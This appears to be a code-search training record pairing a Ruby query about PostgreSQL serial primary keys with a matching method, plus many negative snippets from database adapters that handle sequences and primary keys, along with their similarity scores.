"def reset_sequence!(table, column, sequence = nil)\n # Do nothing by default. Implement for PostgreSQL, Oracle, ...\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def reset_id_seq *tables\n tables.each do |table|\n sql \"SELECT setval('#{table}_id_seq',max(id)) FROM #{table}\"\n end\n end",
"def set_sequence(table_name, pk)\n begin\n stmt = @connection.run(\"select max(#{pk}) + 1 from #{table_name}\")\n next_pk_val = stmt.fetch\n stmt.drop\n flds = table_name.split('.')\n @connection.do(\"sequence_set('#{flds[0]}.#{flds[1]}.#{table_name}.#{pk}', #{next_pk_val}, 0)\")\n return true\n rescue Exception => e\n @logger.unknown(\"exception=#{e}\") if @trace\n end\n return false\n end",
"def reset_sequence_value(name, next_value = nil)\n create_sequence(name)\n unless next_value\n table, field = name.split('_$_')\n next_value = self.select_rows('SELECT MAX(%s) as max FROM %s' % [field, table]).first.first.to_i + 1\n end\n self.execute(\"ALTER TABLE %s_sequence AUTO_INCREMENT = %s\" % [name, next_value || 1])\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Nobody else implements this and it isn't called from anywhere\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Nobody else implements this and it isn't called from anywhere\n end",
"def clear_sequence_setup(database, table)\n table_options = options(table)\n if table_options[:adjust_sequences]\n session.send(database).clear_sequence_setup(\n table_options[:rep_prefix], table\n )\n end\n end",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def test_resets_to_min_pk_with_default_pk_and_sequence\n @instances.each do |instance|\n model = instance.class\n model.delete_all\n model.connection.reset_pk_sequence!(model.table_name)\n\n instance.save!\n assert_equal 1, instance.id, \"Sequence reset for #{model.table_name} failed.\"\n end\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def reset_id\n ActiveRecord::Base.connection.execute(\\\n #'ALTER TABLE category AUTO_INCREMENT = 1')\n # \"DELETE FROM sqlite_sequence WHERE NAME = 'cate'\")\n # \"DELETE FROM sqlite_sequence WHERE NAME = 'categories'\")\n \"DELETE FROM categories; DELETE FROM sqlite_sequence WHERE NAME = 'categories'\")\n \n #\n # @adapter = ActiveRecord::Base.connection.adapter_name\n# \n # @key = maximum(primary_key)\n\n end",
"def test_resets_to_min_pk_with_specified_pk_and_sequence\n @instances.each do |instance|\n model = instance.class\n model.delete_all\n model.connection.reset_pk_sequence!(model.table_name, model.primary_key, model.sequence_name)\n\n instance.save!\n assert_equal 1, instance.id, \"Sequence reset for #{model.table_name} failed.\"\n end\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n default_pk, default_seq = pk_and_sequence_for(table_name)\n default_seq || \"#{table_name}_#{pk || default_pk || 'id'}_seq\"\n end",
"def default_sequence_name(table_name, pk = \"id\")\n nil\n end",
"def reset_db_peak_sequence\n ActiveRecord::Base.connection.tables.each do |t|\n ActiveRecord::Base.connection.reset_pk_sequence!(t)\n end\nend",
"def reset_db_peak_sequence\n ActiveRecord::Base.connection.tables.each do |t|\n ActiveRecord::Base.connection.reset_pk_sequence!(t)\n end\nend",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def reset(sequence_name, value = 0)\n value = 0 if value.to_i <= 0\n value = 1 if value == 0 && UID.configuration.postgres?\n\n diff = []\n diff << uid_current_index(sequence_name)\n\n if UID.configuration.redis?\n $redis.set(sequence_name, value)\n else\n ActiveRecord::Base.connection.select_value(\"ALTER SEQUENCE #{sequence_name} RESTART WITH #{value};\")\n end\n\n diff << uid_current_index(sequence_name)\n diff\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n result = serial_sequence(table_name, pk || 'id')\n return nil unless result\n Utils.extract_schema_qualified_name(result).to_s\n rescue ActiveRecord::StatementInvalid\n Redshift::Name.new(nil, \"#{table_name}_#{pk || 'id'}_seq\").to_s\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def reset_indecies\n puts 'Resetting AR indecies.'\n ApplicationRecord.connection.tables.each { |t| ApplicationRecord.connection.reset_pk_sequence!(t) }\n puts 'Restore complete'\n end",
"def inititalize\n @id = @@next_table_id\n @@next_table_id += 1\n\n def self.preview_next_id\n @@next_table_id\n end\n end",
"def clear_primary_key\n @attributes[self.primary_key_attribute] = nil\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def getNextSequence(table,db)\n\t\tif db[table].count == 0\n\t\t\treturn 1\n\t\telse\n\t\t\tdb[table].find().sort(_id: -1).limit(1).each do |document|\n\t\t\t\treturn document[:_id]+1\n\t\t\tend\n\t\tend\n\tend",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def assign_tx_seq_num\n self.update(tx_seq_num: Order.max_tx_seq_num + 1) \n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def default_sequence_name(table_name, column = nil)\n pk, seq = pk_and_sequence_for(table_name)\n if column && (pk != column)\n # Is this ever actually called with a non-pk column?\n nil\n else\n seq\n end\n rescue\n nil\n end",
"def default_sequence_name(table, _column)\n \"#{table}_seq\"\n end",
"def set_key\n last_key = Issue.find_by_sql('select max(issueId) as maxid from issue')[0].maxid\n self.issueId = last_key.to_i + 1\n end",
"def reset_initial_version\n @initial_version = last_committed_sequence_number\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def primary_key=(key)\n @primary_key = key\n end",
"def next_sequence_id\n last_sequence_id + 1\n end",
"def primary_key(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def primary_key(_table_name)\n []\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def clear_sequence_setup(rep_prefix, table_name)\n sequence_table_name = \"#{rep_prefix}_sequences\"\n if tables.include?(sequence_table_name)\n trigger_name = \"#{rep_prefix}_#{table_name}_sequence\"\n trigger_row = select_one(<<-end_sql)\n select * from information_schema.triggers\n where trigger_schema = database()\n and trigger_name = '#{trigger_name}'\n end_sql\n if trigger_row\n execute \"DROP TRIGGER `#{trigger_name}`\"\n execute \"delete from #{sequence_table_name} where name = '#{table_name}'\"\n unless select_one(\"select * from #{sequence_table_name}\")\n # no more sequences left --> delete sequence table\n drop_table sequence_table_name.to_sym\n end\n end\n end\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def no_primary_key\n clear_setter_methods_cache\n self.simple_pk = @primary_key = nil\n end",
"def no_primary_key\n clear_setter_methods_cache\n self.simple_pk = @primary_key = nil\n end",
"def remove_cached_schema(table)\n tab = quote_schema_table(table)\n Sequel.synchronize do\n @primary_keys.delete(tab)\n end\n super\n end",
"def increment_sequence_number\n @sequence_number += 1\n @sequence_number = 0 if @sequence_number > 0xFFFFFFFF\n end",
"def next_for(table)\n table = table.respond_to?(:table_name) ? table.table_name : table.to_s\n next_id :table => table\n end",
"def _next_id\n @@id -= 1\n @@id\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def set_key\n last_key = User.find_by_sql('select max(userId) as maxid from user')[0].maxid\n self.userId = last_key.to_i + 1\n end",
"def initialize\n \t @id = @@next_table_id\n \t @@next_table_id += 1\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def remove_cached_schema(table)\n tab = quote_schema_table(table)\n Sequel.synchronize do\n @primary_keys.delete(tab)\n @primary_key_sequences.delete(tab)\n end\n super\n end",
"def reset_table_name #:nodoc:\n self.table_name = compute_table_name\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def roomer_reset_table_name\n if @roomer_original_table_name\n self.table_name = \"#{table_name_prefix}#{@roomer_original_table_name}\"\n else\n reset_table_name\n end\n roomer_ensure_table_name_prefix\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def change_sequence(name, options = {})\n execute change_sequence_sql(name, options)\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n @primary_key\n end",
"def primary_keys(table)\n row = exec_query(<<-end_sql, 'SCHEMA').rows.map do |row|\n SELECT DISTINCT(attr.attname)\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = cons.conkey[1]\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n row && row.first\n end\n end",
"def restrict_primary_key\n clear_setter_methods_cache\n @restrict_primary_key = true\n end",
"def restrict_primary_key\n clear_setter_methods_cache\n @restrict_primary_key = true\n end",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def set_next_seqno\n a = self.pcp_subject.pcp_items\n m = a.maximum( :seqno ) || 0\n n = a.count\n self.seqno = ( n > m ? n : m ) + 1\n end",
"def sequence\n # noop\n @state = :id\n end",
"def primary_key\n self[:primary_key] ||= self[:model].primary_key\n end",
"def sequence_values(rep_prefix, table_name)\n # check if the table has an auto_increment column, return if not\n sequence_row = select_one(<<-end_sql)\n show columns from `#{table_name}` where extra = 'auto_increment'\n end_sql\n return {} unless sequence_row\n column_name = sequence_row['Field']\n\n # check if the sequences table exists, create if necessary\n sequence_table_name = \"#{rep_prefix}_sequences\"\n unless tables.include?(sequence_table_name)\n create_table \"#{sequence_table_name}\".to_sym,\n :id => false, :options => 'ENGINE=MyISAM' do |t|\n t.column :name, :string\n t.column :current_value, :integer\n t.column :increment, :integer\n t.column :offset, :integer\n end\n ActiveRecord::Base.connection.execute(<<-end_sql) rescue nil\n ALTER TABLE \"#{sequence_table_name}\"\n ADD CONSTRAINT #{sequence_table_name}_pkey\n PRIMARY KEY (name)\n end_sql\n end\n\n sequence_row = select_one(\"select current_value, increment, offset from #{sequence_table_name} where name = '#{table_name}'\")\n if sequence_row == nil\n current_max = select_one(<<-end_sql)['current_max'].to_i\n select max(`#{column_name}`) as current_max from `#{table_name}`\n end_sql\n return {column_name => {\n :increment => 1,\n :value => current_max\n }\n }\n else\n return {column_name => {\n :increment => sequence_row['increment'].to_i,\n :value => sequence_row['offset'].to_i\n }\n }\n end\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def remove_previous_entries\n Entry.delete_all\n Entry.connection.execute('ALTER TABLE entries AUTO_INCREMENT = 0')\n end",
"def assign_objectid_primary_key\n self.class.objectid_columns_manager.assign_objectid_primary_key(self)\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key_index_re\n PRIMARY_KEY_INDEX_RE\n end",
"def primary_key_index_re\n PRIMARY_KEY_INDEX_RE\n end",
"def primary_key!\n @primary_keys << @name\n end"
] |
[
"0.81005555",
"0.80798966",
"0.80725735",
"0.80469537",
"0.80416894",
"0.7450408",
"0.74204576",
"0.7341868",
"0.72347623",
"0.71692264",
"0.7104913",
"0.7014823",
"0.6871635",
"0.66317236",
"0.66317236",
"0.66184896",
"0.6581778",
"0.65705836",
"0.6544491",
"0.6426742",
"0.64015865",
"0.6363617",
"0.6363617",
"0.636186",
"0.6247724",
"0.61781734",
"0.6140087",
"0.61247116",
"0.6098612",
"0.6098612",
"0.6052866",
"0.6033237",
"0.60322815",
"0.6018139",
"0.5978871",
"0.59276026",
"0.592117",
"0.5900161",
"0.5900161",
"0.5897859",
"0.58775663",
"0.58767766",
"0.5862494",
"0.57891834",
"0.57765937",
"0.5750386",
"0.5735678",
"0.5735471",
"0.5706521",
"0.5684599",
"0.56220126",
"0.56190556",
"0.56006366",
"0.55761045",
"0.55735016",
"0.5563029",
"0.5557394",
"0.5525107",
"0.55217075",
"0.5462961",
"0.54366547",
"0.54366547",
"0.54230314",
"0.5412613",
"0.5411165",
"0.5407255",
"0.5400989",
"0.5386789",
"0.53809726",
"0.5376366",
"0.5346946",
"0.5346946",
"0.5331582",
"0.5296254",
"0.5271805",
"0.5267895",
"0.5267895",
"0.5188494",
"0.5186729",
"0.5149807",
"0.51458836",
"0.51458836",
"0.51458836",
"0.5141115",
"0.51305336",
"0.51276344",
"0.51276344",
"0.5125175",
"0.51199734",
"0.5113754",
"0.51129556",
"0.51000327",
"0.5092949",
"0.50916666",
"0.5082864",
"0.5079728",
"0.5068904",
"0.50622356",
"0.50622356",
"0.5042659"
] |
0.8832561
|
0
|
PostgreSQL uses SERIAL psuedotype instead of AUTOINCREMENT for managing incrementing primary keys.
|
def serial_primary_key_options
# :nocov:
auto_increment_key = server_version >= 100002 ? :identity : :serial
# :nocov:
{:primary_key => true, auto_increment_key => true, :type=>Integer}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def serial_primary_key_options\n {:primary_key => true, :type => :integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => :integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => Integer, :auto_increment => true}\n end",
"def serial_primary_key_options\n {:primary_key => true, :type => Integer, :auto_increment => true}\n end",
"def column_definition_serial(field)\n \"INTEGER PRIMARY KEY AUTOINCREMENT\"\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def serial_primary_key_options\n {:primary_key => true, :serial => true, :type=>Integer}\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def set_sequence(table_name, pk)\n begin\n stmt = @connection.run(\"select max(#{pk}) + 1 from #{table_name}\")\n next_pk_val = stmt.fetch\n stmt.drop\n flds = table_name.split('.')\n @connection.do(\"sequence_set('#{flds[0]}.#{flds[1]}.#{table_name}.#{pk}', #{next_pk_val}, 0)\")\n return true\n rescue Exception => e\n @logger.unknown(\"exception=#{e}\") if @trace\n end\n return false\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk && sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n\n pk ||= default_pk\n sequence ||= default_sequence\n end\n\n if @logger && pk && !sequence\n @logger.warn \"#{table} has primary key #{pk} with no default sequence.\"\n end\n\n if pk && sequence\n quoted_sequence = quote_table_name(sequence)\n max_pk = query_value(\"SELECT MAX(#{quote_column_name pk}) FROM #{quote_table_name(table)}\", \"SCHEMA\")\n if max_pk.nil?\n if postgresql_version >= 100000\n minvalue = query_value(\"SELECT seqmin FROM pg_sequence WHERE seqrelid = #{quote(quoted_sequence)}::regclass\", \"SCHEMA\")\n else\n minvalue = query_value(\"SELECT min_value FROM #{quoted_sequence}\", \"SCHEMA\")\n end\n end\n if max_pk\n # NOTE(joey): This is done to replace the call:\n #\n # SELECT setval(..., max_pk, false)\n #\n # with\n #\n # SELECT setval(..., max_pk-1)\n #\n # These two statements are semantically equivilant, but\n # setval(string, int, bool) is not supported by CockroachDB.\n #\n # FIXME(joey): This is incorrect if the sequence is not 1\n # incremented. We would need to pull out the custom increment value.\n max_pk - 1\n end\n query_value(\"SELECT setval(#{quote(quoted_sequence)}, #{max_pk ? max_pk : minvalue})\", \"SCHEMA\")\n end\n end",
"def reset_primary_key_sequence(table)\n return unless seq = primary_key_sequence(table)\n pk = SQL::Identifier.new(primary_key(table))\n db = self\n s, t = schema_and_table(table)\n table = Sequel.qualify(s, t) if s\n\n if server_version >= 100000\n seq_ds = metadata_dataset.from(:pg_sequence).where(:seqrelid=>regclass_oid(LiteralString.new(seq)))\n increment_by = :seqincrement\n min_value = :seqmin\n # :nocov:\n else\n seq_ds = metadata_dataset.from(LiteralString.new(seq))\n increment_by = :increment_by\n min_value = :min_value\n # :nocov:\n end\n\n get{setval(seq, db[table].select(coalesce(max(pk)+seq_ds.select(increment_by), seq_ds.select(min_value))), false)}\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def auto_increment_sql\n AUTO_INCREMENT\n end",
"def insert_sequenced(row)\n sql = row.type.insert_sql_minus_key\n vals = row.field_values_minus_key\n#$stderr.puts sql\n#$stderr.puts vals.inspect\n\n db.do(sql, *vals)\n insert_id = db.select_one(row.type.get_insert_id_sql)[0]\n row.send(row.type.primary_key.setter_name, insert_id)\n row.reset_changed\n end",
"def auto_increment_sql\n 'AUTOINCREMENT'\n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def primary_key_sequence(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_key_sequences[quoted_table] if @primary_key_sequences.has_key?(quoted_table)}\n cond = {Sequel[:t][:oid] => regclass_oid(table, opts)}\n value = if pks = _select_serial_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], pks[:sequence]))\n elsif pks = _select_custom_sequence_ds.first(cond)\n literal(SQL::QualifiedIdentifier.new(pks[:schema], LiteralString.new(pks[:sequence])))\n end\n\n Sequel.synchronize{@primary_key_sequences[quoted_table] = value} if value\n end",
"def default_sequence_name(table_name, pri_key = nil)\n serial_sequence(table_name, pri_key || 'id').split('.').last\n rescue ActiveRecord::StatementInvalid\n \"#{table_name}_#{pri_key || 'id'}_seq\"\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table_name, primary_key=nil, sequence_name=nil)\n primary_key, seq_schema, sequence_name = pk_and_sequence_for(table_name, true)\n if primary_key && !sequence_name\n @logger.warn \"#{table_name} has primary key #{primary_key} with no sequence\" if @logger\n end\n\n if primary_key && sequence_name\n seq_from_where = \"FROM information_schema.sequences \"+\n \"WHERE sequence_schema='#{quote_string(seq_schema)}' \"+\n \"AND sequence_name='#{quote_string(sequence_name)}'\"\n result = select_rows(\n \"SELECT COALESCE(MAX(#{quote_column_name(primary_key)} + (SELECT increment #{seq_from_where})), \"+\n \" (SELECT minimum_value #{seq_from_where})) \"+\n \"FROM #{quote_table_name(table_name)}\",\n SCHEMA_LOG_NAME\n )\n\n if result.length == 1\n # The COMMIT; BEGIN; can go away when 1) transactional DDL is available 2) There is a better restart/set function\n execute(\n \"COMMIT; \"+\n \"CALL sys.alter_seq_restart('#{quote_string(seq_schema)}', '#{quote_string(sequence_name)}', #{result[0][0]}); \"+\n \"BEGIN;\",\n SCHEMA_LOG_NAME\n )\n else\n @logger.warn \"Unable to determin max value for #{table_name}.#{primary_key}\" if @logger\n end\n end\n end",
